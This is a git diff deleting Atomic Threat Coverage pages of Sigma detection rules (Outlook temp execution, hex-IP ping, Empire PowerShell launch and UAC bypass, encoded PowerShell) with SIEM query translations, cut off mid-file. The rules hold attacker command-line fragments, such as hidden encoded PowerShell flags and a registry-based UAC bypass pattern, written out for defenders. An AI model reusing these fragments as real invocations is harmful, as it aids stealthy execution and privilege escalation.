-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Execution in Outlook Temp Folder'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:*\\Temporary Internet Files\\Content.Outlook\\*
-```
-
-
-### splunk
-    
-```
-Image="*\\Temporary Internet Files\\Content.Outlook\\*" | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\Temporary Internet Files\\Content.Outlook\\*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\Temporary Internet Files\Content\.Outlook\\.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ping_hex_ip.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ping_hex_ip.md
deleted file mode 100644
index cd659bd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ping_hex_ip.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Ping Hex IP       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a ping command that uses a hex encoded IP address |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1140: Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)</li><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1140: Deobfuscate/Decode Files or Information](../Triggers/T1140.md)</li><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely, because no sane admin pings IP addresses in a hexadecimal form</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna](https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna)</li><li>[https://twitter.com/vysecurity/status/977198418354491392](https://twitter.com/vysecurity/status/977198418354491392)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Ping Hex IP
-id: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd
-description: Detects a ping command that uses a hex encoded IP address
-references:
-    - https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna
-    - https://twitter.com/vysecurity/status/977198418354491392
-author: Florian Roth
-date: 2018/03/23
-tags:
-    - attack.defense_evasion
-    - attack.t1140
-    - attack.t1027
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\ping.exe 0x*'
-            - '*\ping 0x*'
-    condition: selection
-fields:
-    - ParentCommandLine
-falsepositives:
-    - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\ping.exe 0x.*" -or $_.message -match "CommandLine.*.*\\ping 0x.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\ping.exe\ 0x* OR *\\ping\ 0x*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1a0d4aba-7668-4365-9ce4-6d79ab088dfd <<EOF
-{
-  "metadata": {
-    "title": "Ping Hex IP",
-    "description": "Detects a ping command that uses a hex encoded IP address",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1140",
-      "attack.t1027"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\ping.exe\\ 0x* OR *\\\\ping\\ 0x*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\ping.exe\\ 0x* OR *\\\\ping\\ 0x*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Ping Hex IP'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\ping.exe 0x* *\\ping 0x*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\ping.exe 0x*" OR CommandLine="*\\ping 0x*") | table ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\ping.exe 0x*", "*\\ping 0x*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\ping\.exe 0x.*|.*.*\ping 0x.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_launch.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_launch.md
deleted file mode 100644
index 5d25741..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_launch.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Empire PowerShell Launch Parameters       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious powershell command line parameters used in Empire |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165](https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165)</li><li>[https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191](https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191)</li><li>[https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178](https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178)</li><li>[https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64](https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Empire PowerShell Launch Parameters
-id: 79f4ede3-402e-41c8-bc3e-ebbf5f162581
-description: Detects suspicious powershell command line parameters used in Empire
-status: experimental
-references:
-    - https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165
-    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191
-    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178
-    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
-author: Florian Roth
-date: 2019/04/20
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* -NoP -sta -NonI -W Hidden -Enc *'
-            - '* -noP -sta -w 1 -enc *'
-            - '* -NoP -NonI -W Hidden -enc *'
-    condition: selection
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -NoP -sta -NonI -W Hidden -Enc .*" -or $_.message -match "CommandLine.*.* -noP -sta -w 1 -enc .*" -or $_.message -match "CommandLine.*.* -NoP -NonI -W Hidden -enc .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ \-NoP\ \-sta\ \-NonI\ \-W\ Hidden\ \-Enc\ * OR *\ \-noP\ \-sta\ \-w\ 1\ \-enc\ * OR *\ \-NoP\ \-NonI\ \-W\ Hidden\ \-enc\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/79f4ede3-402e-41c8-bc3e-ebbf5f162581 <<EOF
-{
-  "metadata": {
-    "title": "Empire PowerShell Launch Parameters",
-    "description": "Detects suspicious powershell command line parameters used in Empire",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-NoP\\ \\-sta\\ \\-NonI\\ \\-W\\ Hidden\\ \\-Enc\\ * OR *\\ \\-noP\\ \\-sta\\ \\-w\\ 1\\ \\-enc\\ * OR *\\ \\-NoP\\ \\-NonI\\ \\-W\\ Hidden\\ \\-enc\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-NoP\\ \\-sta\\ \\-NonI\\ \\-W\\ Hidden\\ \\-Enc\\ * OR *\\ \\-noP\\ \\-sta\\ \\-w\\ 1\\ \\-enc\\ * OR *\\ \\-NoP\\ \\-NonI\\ \\-W\\ Hidden\\ \\-enc\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Empire PowerShell Launch Parameters'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* \-NoP \-sta \-NonI \-W Hidden \-Enc * * \-noP \-sta \-w 1 \-enc * * \-NoP \-NonI \-W Hidden \-enc *)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* -NoP -sta -NonI -W Hidden -Enc *" OR CommandLine="* -noP -sta -w 1 -enc *" OR CommandLine="* -NoP -NonI -W Hidden -enc *")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* -NoP -sta -NonI -W Hidden -Enc *", "* -noP -sta -w 1 -enc *", "* -NoP -NonI -W Hidden -enc *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* -NoP -sta -NonI -W Hidden -Enc .*|.*.* -noP -sta -w 1 -enc .*|.*.* -NoP -NonI -W Hidden -enc .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_uac_bypass.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_uac_bypass.md
deleted file mode 100644
index faf4601..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_uac_bypass.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Empire PowerShell UAC Bypass       |
-|:-------------------------|:------------------|
-| **Description**          | Detects some Empire PowerShell UAC bypass methods |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1088: Bypass User Account Control](https://attack.mitre.org/techniques/T1088)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64](https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64)</li><li>[https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64](https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64)</li></ul>  |
-| **Author**               | Ecco |
-| Other Tags           | <ul><li>car.2019-04-001</li><li>attack.t1548.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Empire PowerShell UAC Bypass
-id: 3268b746-88d8-4cd3-bffc-30077d02c787
-status: experimental
-description: Detects some Empire PowerShell UAC bypass methods
-references:
-    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
-    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
-author: Ecco
-date: 2019/08/30
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)*'
-            - '* -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);*'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.defense_evasion
-    - attack.privilege_escalation
-    - attack.t1088
-    - car.2019-04-001
-    - attack.t1548.002
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update).*" -or $_.message -match "CommandLine.*.* -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ \-NoP\ \-NonI\ \-w\ Hidden\ \-c\ $x\=$\(\(gp\ HKCU\:Software\\Microsoft\\Windows\ Update\).Update\)* OR *\ \-NoP\ \-NonI\ \-c\ $x\=$\(\(gp\ HKCU\:Software\\Microsoft\\Windows\ Update\).Update\);*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3268b746-88d8-4cd3-bffc-30077d02c787 <<EOF
-{
-  "metadata": {
-    "title": "Empire PowerShell UAC Bypass",
-    "description": "Detects some Empire PowerShell UAC bypass methods",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.privilege_escalation",
-      "attack.t1088",
-      "car.2019-04-001",
-      "attack.t1548.002"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-NoP\\ \\-NonI\\ \\-w\\ Hidden\\ \\-c\\ $x\\=$\\(\\(gp\\ HKCU\\:Software\\\\Microsoft\\\\Windows\\ Update\\).Update\\)* OR *\\ \\-NoP\\ \\-NonI\\ \\-c\\ $x\\=$\\(\\(gp\\ HKCU\\:Software\\\\Microsoft\\\\Windows\\ Update\\).Update\\);*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-NoP\\ \\-NonI\\ \\-w\\ Hidden\\ \\-c\\ $x\\=$\\(\\(gp\\ HKCU\\:Software\\\\Microsoft\\\\Windows\\ Update\\).Update\\)* OR *\\ \\-NoP\\ \\-NonI\\ \\-c\\ $x\\=$\\(\\(gp\\ HKCU\\:Software\\\\Microsoft\\\\Windows\\ Update\\).Update\\);*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Empire PowerShell UAC Bypass'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* \-NoP \-NonI \-w Hidden \-c $x=$\(\(gp HKCU\:Software\\Microsoft\\Windows Update\).Update\)* * \-NoP \-NonI \-c $x=$\(\(gp HKCU\:Software\\Microsoft\\Windows Update\).Update\);*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)*" OR CommandLine="* -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)*", "* -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* -NoP -NonI -w Hidden -c \$x=\$\(\(gp HKCU:Software\\Microsoft\\Windows Update\)\.Update\).*|.*.* -NoP -NonI -c \$x=\$\(\(gp HKCU:Software\\Microsoft\\Windows Update\)\.Update\);.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_enc_cmd.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_enc_cmd.md
deleted file mode 100644
index bf4ff3e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_enc_cmd.md
+++ /dev/null
@@ -1,194 +0,0 @@
-| Title                    | Suspicious Encoded PowerShell Command Line       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e](https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e)</li></ul>  |
-| **Author**               | Florian Roth, Markus Neis |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Encoded PowerShell Command Line
-id: ca2092a1-c273-4878-9b4b-0d60115bf5ea
-description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
-status: experimental
-references:
-    - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e
-author: Florian Roth, Markus Neis
-date: 2018/09/03
-modified: 2019/12/16
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* -e JAB*'
-            - '* -e  JAB*'
-            - '* -e   JAB*'
-            - '* -e    JAB*'
-            - '* -e     JAB*'
-            - '* -e      JAB*'
-            - '* -en JAB*'
-            - '* -enc JAB*'
-            - '* -enc* JAB*'
-            - '* -w hidden -e* JAB*'
-            - '* BA^J e-'
-            - '* -e SUVYI*'
-            - '* -e aWV4I*'
-            - '* -e SQBFAFgA*'
-            - '* -e aQBlAHgA*'
-            - '* -enc SUVYI*'
-            - '* -enc aWV4I*'
-            - '* -enc SQBFAFgA*'
-            - '* -enc aQBlAHgA*'
-    falsepositive1:
-        CommandLine: '* -ExecutionPolicy remotesigned *'
-    condition: selection and not falsepositive1
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -e JAB.*" -or $_.message -match "CommandLine.*.* -e  JAB.*" -or $_.message -match "CommandLine.*.* -e   JAB.*" -or $_.message -match "CommandLine.*.* -e    JAB.*" -or $_.message -match "CommandLine.*.* -e     JAB.*" -or $_.message -match "CommandLine.*.* -e      JAB.*" -or $_.message -match "CommandLine.*.* -en JAB.*" -or $_.message -match "CommandLine.*.* -enc JAB.*" -or $_.message -match "CommandLine.*.* -enc.* JAB.*" -or $_.message -match "CommandLine.*.* -w hidden -e.* JAB.*" -or $_.message -match "CommandLine.*.* BA^J e-" -or $_.message -match "CommandLine.*.* -e SUVYI.*" -or $_.message -match "CommandLine.*.* -e aWV4I.*" -or $_.message -match "CommandLine.*.* -e SQBFAFgA.*" -or $_.message -match "CommandLine.*.* -e aQBlAHgA.*" -or $_.message -match "CommandLine.*.* -enc SUVYI.*" -or $_.message -match "CommandLine.*.* -enc aWV4I.*" -or $_.message -match "CommandLine.*.* -enc SQBFAFgA.*" -or $_.message -match "CommandLine.*.* -enc aQBlAHgA.*") -and  -not ($_.message -match "CommandLine.*.* -ExecutionPolicy remotesigned .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*\ \-e\ JAB* OR *\ \-e\ \ JAB* OR *\ \-e\ \ \ JAB* OR *\ \-e\ \ \ \ JAB* OR *\ \-e\ \ \ \ \ JAB* OR *\ \-e\ \ \ \ \ \ JAB* OR *\ \-en\ JAB* OR *\ \-enc\ JAB* OR *\ \-enc*\ JAB* OR *\ \-w\ hidden\ \-e*\ JAB* OR *\ BA\^J\ e\- OR *\ \-e\ SUVYI* OR *\ \-e\ aWV4I* OR *\ \-e\ SQBFAFgA* OR *\ \-e\ aQBlAHgA* OR *\ \-enc\ SUVYI* OR *\ \-enc\ aWV4I* OR *\ \-enc\ SQBFAFgA* OR *\ \-enc\ aQBlAHgA*) AND (NOT (winlog.event_data.CommandLine.keyword:*\ \-ExecutionPolicy\ remotesigned\ *)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ca2092a1-c273-4878-9b4b-0d60115bf5ea <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Encoded PowerShell Command Line",
-    "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*\\ \\-e\\ JAB* OR *\\ \\-e\\ \\ JAB* OR *\\ \\-e\\ \\ \\ JAB* OR *\\ \\-e\\ \\ \\ \\ JAB* OR *\\ \\-e\\ \\ \\ \\ \\ JAB* OR *\\ \\-e\\ \\ \\ \\ \\ \\ JAB* OR *\\ \\-en\\ JAB* OR *\\ \\-enc\\ JAB* OR *\\ \\-enc*\\ JAB* OR *\\ \\-w\\ hidden\\ \\-e*\\ JAB* OR *\\ BA\\^J\\ e\\- OR *\\ \\-e\\ SUVYI* OR *\\ \\-e\\ aWV4I* OR *\\ \\-e\\ SQBFAFgA* OR *\\ \\-e\\ aQBlAHgA* OR *\\ \\-enc\\ SUVYI* OR *\\ \\-enc\\ aWV4I* OR *\\ \\-enc\\ SQBFAFgA* OR *\\ \\-enc\\ aQBlAHgA*) AND (NOT (winlog.event_data.CommandLine.keyword:*\\ \\-ExecutionPolicy\\ remotesigned\\ *)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*\\ \\-e\\ JAB* OR *\\ \\-e\\ \\ JAB* OR *\\ \\-e\\ \\ \\ JAB* OR *\\ \\-e\\ \\ \\ \\ JAB* OR *\\ \\-e\\ \\ \\ \\ \\ JAB* OR *\\ \\-e\\ \\ \\ \\ \\ \\ JAB* OR *\\ \\-en\\ JAB* OR *\\ \\-enc\\ JAB* OR *\\ \\-enc*\\ JAB* OR *\\ \\-w\\ hidden\\ \\-e*\\ JAB* OR *\\ BA\\^J\\ e\\- OR *\\ \\-e\\ SUVYI* OR *\\ \\-e\\ aWV4I* OR *\\ \\-e\\ SQBFAFgA* OR *\\ \\-e\\ aQBlAHgA* OR *\\ \\-enc\\ SUVYI* OR *\\ \\-enc\\ aWV4I* OR *\\ \\-enc\\ SQBFAFgA* OR *\\ \\-enc\\ aQBlAHgA*) AND (NOT (winlog.event_data.CommandLine.keyword:*\\ \\-ExecutionPolicy\\ remotesigned\\ *)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
